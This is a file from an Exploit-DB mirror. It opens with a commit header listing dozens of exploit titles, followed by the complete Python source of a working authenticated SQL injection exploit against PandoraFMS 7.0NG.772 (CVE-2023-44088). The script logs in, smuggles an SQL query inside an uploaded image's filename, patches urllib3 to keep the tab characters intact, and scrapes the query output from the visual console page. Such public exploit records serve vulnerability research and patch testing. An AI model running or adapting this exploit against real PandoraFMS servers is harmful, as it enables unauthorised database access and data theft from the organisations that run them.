exploit-db-mirror/exploits/php/webapps/52157.py
Exploit-DB 60175c9963 DB: 2025-04-14
52 changes to exploits/shellcodes/ghdb

Microchip TimeProvider 4100 (Configuration modules) 2.4.6 - OS Command Injection
Microchip TimeProvider 4100 Grandmaster (Banner Config Modules) 2.4.6 - Stored Cross-Site Scripting (XSS)
Microchip TimeProvider 4100 Grandmaster (Data plot modules) 2.4.6 - SQL Injection
Microchip TimeProvider 4100 (Configuration modules) 2.4.6 - OS Command Injection
Microchip TimeProvider 4100 Grandmaster (Banner Config Modules) 2.4.6 - Stored Cross-Site Scripting (XSS)
Microchip TimeProvider 4100 Grandmaster (Data plot modules) 2.4.6 - SQL Injection

Apache HugeGraph Server 1.2.0 - Remote Code Execution (RCE)

DataEase 2.4.0 - Database Configuration Information Exposure

Cosy+ firmware 21.2s7 - Command Injection

Angular-Base64-Upload Library 0.1.20 - Remote Code Execution (RCE)

K7 Ultimate Security K7RKScan.sys 17.0.2019 - Denial Of Service (DoS)
ABB Cylon Aspect 3.07.02 - File Disclosure (Authenticated)
ABB Cylon Aspect 3.08.01 - Remote Code Execution (RCE)
ABB Cylon Aspect 3.07.02 - File Disclosure
ABB Cylon Aspect 3.08.01 - Remote Code Execution (RCE)

Cisco Smart Software Manager On-Prem 8-202206 - Account Takeover

CyberPanel 2.3.6 - Remote Code Execution (RCE)

IBM Security Verify Access 10.0.0 - Open Redirect during OAuth Flow

Intelight X-1L Traffic controller Maxtime 1.9.6 - Remote Code Execution (RCE)

KubeSphere 3.4.0 - Insecure Direct Object Reference (IDOR)

MagnusSolution magnusbilling 7.3.0 - Command Injection

Palo Alto Networks Expedition 1.2.90.1 - Admin Account Takeover

Progress Telerik Report Server 2024 Q1 (10.0.24.305) - Authentication Bypass

Sonatype Nexus Repository 3.53.0-01 - Path Traversal

Watcharr 1.43.0 - Remote Code Execution (RCE)

Webmin Usermin 2.100 - Username Enumeration
ABB Cylon Aspect 3.07.01 - Hard-coded Default Credentials
ABB Cylon Aspect 3.08.01 - Arbitrary File Delete
ABB Cylon Aspect 3.07.01 - Hard-coded Default Credentials
ABB Cylon Aspect 3.08.01 - Arbitrary File Delete

AquilaCMS 1.409.20 - Remote Command Execution (RCE)

Artica Proxy 4.50 - Remote Code Execution (RCE)

Centron 19.04 - Remote Code Execution (RCE)

ChurchCRM 5.9.1 - SQL Injection

CodeAstro Online Railway Reservation System 1.0 - Cross Site Scripting (XSS)

CodeCanyon RISE CRM 3.7.0 - SQL Injection

Elaine's Realtime CRM Automation 6.18.17 - Reflected XSS

Feng Office 3.11.1.2 - SQL Injection
flatCore 1.5 - Cross Site Request Forgery (CSRF)
flatCore 1.5.5 - Arbitrary File Upload
flatCore 1.5 - Cross Site Request Forgery (CSRF)
flatCore 1.5.5 - Arbitrary File Upload

GetSimpleCMS 3.3.16 - Remote Code Execution (RCE)

Gnuboard5 5.3.2.8 - SQL Injection

LearnPress WordPress LMS Plugin 4.2.7 - SQL Injection

Litespeed Cache 6.5.0.1 - Authentication Bypass

MiniCMS 1.1 - Cross Site Scripting (XSS)

MoziloCMS 3.0 - Remote Code Execution (RCE)

NEWS-BUZZ News Management System 1.0 - SQL Injection

PandoraFMS 7.0NG.772 - SQL Injection

phpIPAM 1.6 - Reflected Cross Site Scripting (XSS)

PZ Frontend Manager WordPress Plugin 1.0.5 - Cross Site Request Forgery (CSRF)

ResidenceCMS 2.10.1 - Stored Cross-Site Scripting (XSS)

RosarioSIS 7.6 - SQL Injection

Roundcube Webmail 1.6.6 - Stored Cross Site Scripting (XSS)
Typecho 1.3.0 - Race Condition
Typecho 1.3.0 - Stored Cross-Site Scripting (XSS)
Typecho 1.3.0 - Race Condition
Typecho 1.3.0 - Stored Cross-Site Scripting (XSS)

X2CRM 8.5 - Stored Cross-Site Scripting (XSS)

Rejetto HTTP File Server 2.3m - Remote Code Execution (RCE)

Microsoft Office 2019 MSO Build 1808 - NTLMv2 Hash Disclosure
2025-04-14 00:16:26 +00:00

136 lines
No EOL
4.6 KiB
Python
Executable file

# Exploit Title: PandoraFMS 7.0NG.772 - SQL Injection
# Date: 21/11/2023
# Exploit Author: Osama Yousef
# Vendor Homepage: https://pandorafms.com/
# Software Link: https://github.com/pandorafms/pandorafms/releases/download/v772-LTS/pandorafms_agent_linux-7.0NG.772.tar.gz
# Version: v7.0NG.772
# Tested on: Linux
# CVE : CVE-2023-44088
import re, requests, argparse, string, random, base64
import urllib3
import html
headers = {
'Cache-Control': 'max-age=0',
'Origin': '',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36',
'Accept': '*/*',
'Referer': ''
}
def login(session, url, username, password):
res = session.get(url)
csrf = retrieve_csrftoken(res.text)
url+= '?login=1'
payload = "nick={}&pass={}&login_button=Let%27s+go&csrf_code={}"
res = session.post(url, data=payload.format(username, password, csrf), headers={'Content-Type': 'application/x-www-form-urlencoded'})
if 'User is blocked' in res.text:
print("Login Failed!")
exit(1)
def exploit(session, url, imagepath, query):
url1 = url + "?sec=network&sec2=godmode/reporting/visual_console_builder&tab=data"
name = random_id(10)
payload = "{}.jpg',({}),'1','1','1','1');-- helloo.jpg".format(name, query)
payload=payload.replace(' ', '\t')
files = {"background_image": (payload, open(imagepath, 'rb').read(), 'image/jpeg')}
# Create a reference to the original _make_request method
urllib3.connectionpool.HTTPConnectionPool._original_make_request = urllib3.connectionpool.HTTPConnectionPool._make_request
# Replace the _make_request method with the custom_make_request function
urllib3.connectionpool.HTTPConnectionPool._make_request = custom_make_request
res = session.post(url1, files=files, data={'action':'save', 'name':name, 'id_group': 0, 'background_image': 'None.png', 'background_color': '#ffffff', 'width': '1024', 'height': '768', 'is_favourite_sent': '0', 'auto_adjust_sent': '0', 'update_layout': 'Save'})
if 'Created successfully' not in res.text:
print("Failed to create a visual console!")
exit(1)
url2 = url + "?sec=godmode/reporting/map_builder&sec2=godmode/reporting/map_builder"
res = session.get(url2)
x = re.search('(?:<a href=".*">)'+name, res.text)
match = x.group()
url3 = match.lstrip("<a href=")
url3 = url3.split('"')[1]
url3 = url3.split("?")[1]
url3 = html.unescape(url3)
url4 = url+ "?" + url3
res = session.get(url4)
x = re.search('(?:var props = {"autoAdjust":true,"backgroundColor":".*","backgroundImage")', res.text)
match = x.group()
output = match.lstrip('var props = {"autoAdjust":true,"backgroundColor":"')
output = output.split('","backgroundImage')[0]
print("Query output: {}".format(output))
def retrieve_csrftoken(response):
x = re.search('(?:<input id="hidden-csrf_code" name="csrf_code" type="hidden" value=")[a-zA-Z0-9]*(?:")', response)
match = x.group()
csrf = match.lstrip('<input id="hidden-csrf_code" name="csrf_code" type="hidden" value="').rstrip('"')
print("CSRF: {}".format(csrf))
return csrf
def random_id(len):
chars = string.ascii_uppercase + string.ascii_lowercase + string.digits
return ''.join(random.choice(chars) for _ in range(len))
def custom_make_request(self, conn, method, url, timeout=urllib3.connectionpool._Default, chunked=False, **httplib_request_kw):
body = httplib_request_kw['body']
if body:
body = body.replace(b"%09", b"\t"*3)
httplib_request_kw['body'] = body
return self._original_make_request(conn, method, url, timeout=timeout, chunked=chunked, **httplib_request_kw)
def main():
ap = argparse.ArgumentParser()
ap.add_argument("-t", "--target", required=True, help="Target URI")
ap.add_argument("-u", "--username", required=True, help="Username")
ap.add_argument("-p", "--password", required=True, help="Password")
ap.add_argument("-i", "--image", required=True, help="Image path")
ap.add_argument("-q", "--query", required=True, help="SQL Query to execute")
ap.add_argument("-x", "--proxy", required=False, help="Proxy Configuration (e.g., http://127.0.0.1:8080/)")
args = vars(ap.parse_args())
session = requests.Session()
url = args['target']
if 'pandora_console' not in url:
if not url.endswith('/'):
url += '/'
url += 'pandora_console/'
headers['Origin'] = args['target']
headers['Referer'] = args['target']
session.headers.update(headers)
proxies = {}
if args['proxy'] is not None:
if 'https' in args['proxy']:
proxies['https'] = args['proxy']
else:
proxies['http'] = args['proxy']
session.proxies.update(proxies)
login(session, url, args['username'], args['password'])
exploit(session, url, args['image'], args['query'])
if __name__=='__main__':
main()